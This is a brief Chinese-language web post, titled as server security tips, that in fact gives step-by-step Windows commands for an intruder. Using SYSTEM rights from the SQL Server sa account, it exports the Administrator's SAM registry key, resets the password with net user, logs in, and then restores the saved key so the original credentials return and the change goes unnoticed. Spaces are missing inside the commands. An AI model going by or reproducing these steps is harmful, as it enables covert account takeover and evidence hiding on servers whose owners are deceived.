服务器安全设置小技巧

时间:2022-06-01 14:06:13

1.

sa默认是SYSTEM权限,可以读sam键.

regexportHKLM\SAM\SAM\Domains\Account\Users\000001F4c:\trace.reg

netuseradministratortest

用administrator登陆.

用完机器后

regimportc:\trace.reg

这样就不用克隆,用管理员帐户即可.

2.

如果没用默认的administrator,可以用下面的方法找到对应的sid.

regedit/ec:\test.regHKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\用户名

3.

2000系统不存在REG,用Regedit更具有通用性

regedit/ec:\trace.regHKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4

regedit要写完整路径,不可以用HKLM代替HKEY_LOCAL_MACHINE

完事后用regedit/sc:\trace.reg恢复原来的键值。